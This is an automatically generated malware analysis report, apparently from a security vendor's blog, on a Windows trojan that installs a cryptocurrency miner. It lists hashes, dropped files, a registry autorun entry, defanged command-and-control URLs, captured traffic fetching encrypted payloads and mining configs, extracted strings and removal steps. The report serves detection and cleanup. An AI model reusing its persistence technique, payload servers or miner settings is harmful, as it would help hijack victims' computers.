Gen.Variant.Kazy.454509_f4cd8daa5f

by malwarelabrobot on November 2nd, 2016 in Malware Descriptions.

Trojan.Win32.Miner.sugf (Kaspersky), Gen:Variant.Kazy.454509 (B) (Emsisoft), Gen:Variant.Kazy.454509 (AdAware), Installer.Win32.InnoSetup.FD, Trojan.Win32.Iconomon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: f4cd8daa5f80438e17d003fa8d2d9468
SHA1: 506d33fbfcb85d467da1f0d6a494beda01463802
SHA256: 00d2bf4b9ddf8d128ae26cda81cea799030dd9460a8f0fc924d2dee385ca9351
SSDeep: 196608:fukIKMqJ8q1x/KR8yjzJmXY72chyqW2w4A9IU:2kIKMqJ8q1xBywXe1MT2HAN
Size: 6749215 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-09-04 00:25:24
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mic.exe:264
yfRl.exe:2924
%original file name%.exe:2704
setup.exe:2928

The Trojan injects its code into the following process(es):

setup.tmp:2060

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mic.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (48492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\Ux (1 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (0 bytes)

The process yfRl.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\F (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\10[1].htm (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\32_2[1].mining (283058 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\RlyfP7 (306 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\options (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\yfR (226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\lRfy (36 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\lel.arch (235493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\fylRx (226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\svcnost.exe (269510 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\VZaqC (879 bytes)

The process %original file name%.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (24537 bytes)

The Trojan deletes the following file(s):

C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (0 bytes)

The process setup.tmp:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\isgsg.dll (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\ISDone.dll (3681 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\BASS.dll (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\CallbackCtrl.dll (4 bytes)

The process setup.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-TV3I5.tmp\setup.tmp (50 bytes)

Registry activity

The process mic.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"yRF" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe /yfRlFxP79ACugWTUxUTlVaBNuyoJcpZUyMkebi17VoZjaPqHCA4cxDScRhqpiAG"

The process yfRl.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\yfRl_RASAPI32]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process setup.tmp:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "0C 08 00 00 54 E1 89 D3 01 34 D2 01"
"SessionHash" = "93 5F 14 FF 97 17 AA D7 5B 67 40 5D 4B 42 F3 46"

Dropped PE files

MD5 File path
e8c7565c5100abfa25ff00c45fa2e0dd c:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe
b2d487100289cdbbfbab5592f69c74f0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-5PND6.tmp\setup.tmp
8005750ec63eb5292884ad6183ae2e77 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\BASS.dll
f07e819ba2e46a897cfabf816d7557b2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\CallbackCtrl.dll
4feafa8b5e8cdb349125c8af0ac43974 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\ISDone.dll
92dc6ef532fbb4a5c3201469a5b5eb63 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\_isetup\_shfoldr.dll
09974eaff6defadde38b1328754dbe09 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OD0UQ.tmp\isgsg.dll
e8c7565c5100abfa25ff00c45fa2e0dd c:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\O2Og.exe
dc66679be16d4e98a08a333e7070ed18 c:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\uE4st2b0\svcnost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             132923        133120    4.59349  5330425dbd024f751d37953da42139de
.rdata  139264           38724         38912     3.27133  8fe23fff274de57efa3108c2916a28dc
.data   180224           15872         7168      2.66632  b7e49abe645b61cdda21d1d84b193153
.rsrc   196608           129352        129536    5.3618   9297de865554b4ca00e08d84e6366a31
.reloc  327680           36194         36352     1.4767   99c04a359954fb1b7dc6216091ec8c11

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
275c5eeae2c1637aa9b35f63a487c2fe

URLs

URL IP
hxxp://api.vk.com/method/wall.get.xml 87.240.165.66
hxxp://api.vk.com/method/wall.get.xml?count=1&owner_id=-76378965 87.240.165.66
hxxp://82.146.54.187/reborn_updates/10_a.lalka.raum_encrypted
hxxp://82.146.54.187/wKUyVIeW5Ei0N670Vu1r47UtOOb8e3uAwKUyVIeW5Ei0N670Vu1r47UtOOb8e3uA/0/0/0/5/10/
hxxp://82.146.54.187/bitfury_updates/61.update.raum
hxxp://82.146.54.187/CSD/32_2.mining
dns.msftncsi.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /method/wall.get.xml HTTP/1.0
Host: api.vk.com
Cache-Control: max-age=0, no-store
User-agent: Mozilla/4.8 [en] (Windows NT 5.0; U)


HTTP/1.1 200 OK
Server: Apache
Date: Tue, 01 Nov 2016 05:36:05 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 371
Connection: close
X-Powered-By: PHP/3.6865
Set-Cookie: remixlang=1; expires=Sat, 11 Nov 2017 23:56:04 GMT; path=/; domain=.vk.com
Pragma: no-cache
Cache-control: no-store
<?xml version="1.0" encoding="utf-8"?>.<error>. <error_
code>100</error_code>. <error_msg>One of the parameters
specified was missing or invalid: owner_id is undefined</error_msg
>. <request_params list="true">. <param>. <key>
oauth</key>. <value>1</value>. </param>.
<param>. <key>method</key>. <value>wall.ge
t.xml</value>. </param>. </request_params>.</err
or>...


GET /bitfury_updates/61.update.raum HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><
head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /bi
tfury_updates/61.update.raum was not found on this server.</p>.<
hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 82.146.54
.187 Port 80</address>.</body></html>...


GET /method/wall.get.xml?count=1&owner_id=-76378965 HTTP/1.0
Host: api.vk.com
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1


HTTP/1.1 200 OK
Server: Apache
Date: Tue, 01 Nov 2016 05:36:06 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 1567
Connection: close
X-Powered-By: PHP/3.6865
Set-Cookie: remixlang=1; expires=Mon, 30 Oct 2017 23:53:13 GMT; path=/; domain=.vk.com
Pragma: no-cache
Cache-control: no-store
<?xml version="1.0" encoding="utf-8"?>.<response list="true">
. <count>61</count>. <post>. <id>281</i
d>. <from_id>-76378965</from_id>. <to_id>-76378
965</to_id>. <date>1424566591</date>. <post_typ
e>post</post_type>. <text>pgDYB3vWx2LKCZ43nJm3odK2nsW3
Dxq cJXZAwDUpM51BgW8l3nPz24 </text>. <comments>. &l

<<< skipped >>>

GET /reborn_updates/10_a.lalka.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/4.8 [en] (Windows NT 5.0; U)


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:06 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Sun, 22 Feb 2015 00:54:42 GMT
ETag: "253008-2f200-50fa2bb243c7e"
Accept-Ranges: bytes
Content-Length: 193024
Connection: close
Content-Type: text/plain; charset=UTF-8

<<< skipped >>>

GET /reborn_updates/10_a.lalka.raum_encrypted HTTP/1.0
Host: 82.146.54.187
Cache-Control: max-age=0, no-store
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:06 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Sun, 22 Feb 2015 00:54:42 GMT
ETag: "253008-2f200-50fa2bb243c7e"
Accept-Ranges: bytes
Content-Length: 193024
Connection: close
Content-Type: text/plain; charset=UTF-8

<<< skipped >>>

GET /CSD/32_2.mining HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Thu, 19 Feb 2015 01:22:53 GMT
ETag: "252fe5-22ecc3-50f66c6688073"
Accept-Ranges: bytes
Content-Length: 2288835
Connection: close
Content-Type: video/unknown
.options.....svcnost.exe...".<pre_exe></pre_exe>..<para
meters>204.27.62.234 9549 2R8cE13emG2DejVioZ1oTh5uwnTzDbMnV9ydZZFFb
8E32HuGLs3 2</parameters>..<main_exe>svcnost.exe</main_
exe>MZ......................@......................................

<<< skipped >>>

GET /xTVBuocZykb1VZaqC4xSRqiGyRFP9CgTxTVBuocZykb1VZaqC4xSRqiGyRFP9CgT/0/0/0/5/10/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:11 GMT
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Content-Length: 879
Connection: close
Content-Type: text/html; charset=UTF-8
<xTVBu>...<ouZcT>48</ouZcT>...<cZuoV>hXXp://82
.146.54.187/bitfury_updates/61.update.raum</cZuoV>...<ZcouB>
666AnotherPassword666</ZcouB>...<qaZV1>....<C4xSR>
null</C4xSR>....<cZuoV>hXXp://82.146.54.187/tools/66.fix<
/cZuoV>...</qaZV1>..</xTVBu>..<TxBVo>...<ykb
1V>....<ky1bZ>X11</ky1bZ>....<ouZcT>1</ouZcT>
....<cZuoV>hXXp://lololohost.com/X11.arch</cZuoV>...<
/ykb1V>...<ykb1V>....<ky1bZ>M7M</ky1bZ>....<ou
ZcT>1</ouZcT>....<cZuoV>hXXp://lololohost.com/M7M.arch
</cZuoV>...</ykb1V>..</TxBVo>..<VBxTc>...<b1
yka>....<VZaqy>X11:params for nvidia x32</VZaqy>....<
ZVqak>X11:params for radeon x32</ZVqak>....<aqVZb>X11:
params for other x32</aqVZb>...</b1yka>...<1bkyq>...
.<VZaqy>M7M:params for nvidia x64</VZaqy>....<ZVqak>
M7M:params for radeon x64</ZVqak>....<aqVZb>M7M:params for
other x64</aqVZb>...</1bkyq>..</VBxTc>..<BVTxZ>
hXXp://82.146.54.187/,hXXp://da0.eu/</BVTxZ>..<uocZx>10<
/uocZx>..


GET /bitfury_updates/61.update.raum HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><
head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /bi
tfury_updates/61.update.raum was not found on this server.</p>.<
hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 82.146.54
.187 Port 80</address>.</body></html>...


GET /wKUyVIeW5Ei0N670Vu1r47UtOOb8e3uAwKUyVIeW5Ei0N670Vu1r47UtOOb8e3uA/0/0/0/5/10/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Content-Length: 879
Connection: close
Content-Type: text/html; charset=UTF-8
<wKUyV>...<IVWeK>48</IVWeK>...<eWVIU>hXXp://82
.146.54.187/bitfury_updates/61.update.raum</eWVIU>...<WeIVy>
666AnotherPassword666</WeIVy>...<076N0>....<Vu1r4>
null</Vu1r4>....<eWVIU>hXXp://82.146.54.187/tools/66.fix<
/eWVIU>...</076N0>..</wKUyV>..<KwyUI>...<5Ei
0N>....<E50i6>X11</E50i6>....<IVWeK>1</IVWeK>
....<eWVIU>hXXp://lololohost.com/X11.arch</eWVIU>...<
/5Ei0N>...<5Ei0N>....<E50i6>M7M</E50i6>....<IV
WeK>1</IVWeK>....<eWVIU>hXXp://lololohost.com/M7M.arch
</eWVIU>...</5Ei0N>..</KwyUI>..<UywKe>...<i0
5E7>....<N6705>X11:params for nvidia x32</N6705>....<
6N07E>X11:params for radeon x32</6N07E>....<70N6i>X11:
params for other x32</70N6i>...</i05E7>...<0iE50>...
.<N6705>M7M:params for nvidia x64</N6705>....<6N07E>
M7M:params for radeon x64</6N07E>....<70N6i>M7M:params for
other x64</70N6i>...</0iE50>..</UywKe>..<yUKwW>
hXXp://82.146.54.187/,hXXp://da0.eu/</yUKwW>..<VIeWw>10<
/VIeWw>..


GET /CSD/32_2.mining HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 82.146.54.187
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 01 Nov 2016 05:36:21 GMT
Server: Apache/2.2.22 (@RELEASE@)
Last-Modified: Thu, 19 Feb 2015 01:22:53 GMT
ETag: "252fe5-22ecc3-50f66c6688073"
Accept-Ranges: bytes
Content-Length: 2288835
Connection: close
Content-Type: video/unknown
.options.....svcnost.exe...".<pre_exe></pre_exe>..<para
meters>204.27.62.234 9549 2R8cE13emG2DejVioZ1oTh5uwnTzDbMnV9ydZZFFb
8E32HuGLs3 2</parameters>..<main_exe>svcnost.exe</main_
exe>MZ......................@......................................

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_2704:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Bv.SCv
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)
Mozilla/4.8 [en] (Windows NT 5.0; U)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1
HTTP/1.0
GetHTTPFile failed with code
Passed args[
/method/wall.get.xml?count=1&owner_id=-
api.vk.com
/method/wall.get.xml
Downloaded. Decrypting with key
hXXp://
Data\Client\Strings_RUS_RU.package
{46F1375C-3A8C-42E1-9A27-0CE809AD35AC}
{48EBEBBF-B9F8-4520-A3CF-89A730721917}
X:\551b45c5a2e3ajn57690b0469d26f1a3
\mic.exe
encryption_key
C:\Users\kali\Documents\Visual Studio 2012\Projects\Mining_framework\Release\RaumLoader.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
RegSetKeyValueA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
GetCPInfo
GetProcessHeap
zcÁ
original_exe_lol
setup.exe
c:\%original file name%.exe
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian

setup.exe_2928:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
KWindows
UrlMon
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Wed(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

setup.tmp_2060:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
EInvalidGraphicOperation
TPent%C
PasswordChar
OnKeyDown
OnKeyPressLkR
OnKeyUp
ssHorizontal
TCustomButton.TButtonStyle
msShiftSelect
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKeyh
THotKey
HotKey
InvalidKeys
vsReport
Uh3%F
TComboBoxExEnumerator
EXPORT
TPSExec
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
AUTOHOTKEYS
RETHINKHOTKEYS
OnKeyPress
t.Htb
1.2.1
TPasswordEdit
TPasswordEditHWL
PasswordEdit*
Password
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
GetPassword
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;

yfRl.exe_2924:


svcnost.exe_1048:


conhost.exe_1768:


%original file name%.exe_3820:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)
Mozilla/4.8 [en] (Windows NT 5.0; U)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1
HTTP/1.0
GetHTTPFile failed with code
Passed args[
/method/wall.get.xml?count=1&owner_id=-
api.vk.com
/method/wall.get.xml
Downloaded. Decrypting with key
hXXp://
Data\Client\Strings_RUS_RU.package
{46F1375C-3A8C-42E1-9A27-0CE809AD35AC}
{48EBEBBF-B9F8-4520-A3CF-89A730721917}
X:\551b45c5a2e3ajn57690b0469d26f1a3
\mic.exe
encryption_key
C:\Users\kali\Documents\Visual Studio 2012\Projects\Mining_framework\Release\RaumLoader.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
RegSetKeyValueA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
GetCPInfo
GetProcessHeap
original_exe_lol
setup.exe
}c:\%original file name%.exe
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />

setup.exe_3980:


setup.tmp_3656:


O2Og.exe_3620:

Found passed UNQ key
RegOpenKeyExA
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Run
hXXp://82.146.54.187/
procexp.exe
Taskmgr.exe
WinDefender.exe
lel.arch
hXXp://82.146.54.187/CSD/64_8.mining
hXXp://82.146.54.187/CSD/32_2.mining
main_exe
CMD line:
URLs:
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
DeleteUrlCacheEntry
WININET.dll
GetCPInfo
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\O2Og.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4L4J4v4
<.=4=8=<=@=
combase.dll
kernel32.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
portuguese-brazilian

svcnost.exe_4012:


conhost.exe_4084:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mic.exe:264
    yfRl.exe:2924
    %original file name%.exe:2704
    setup.exe:2928

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (48492 bytes)
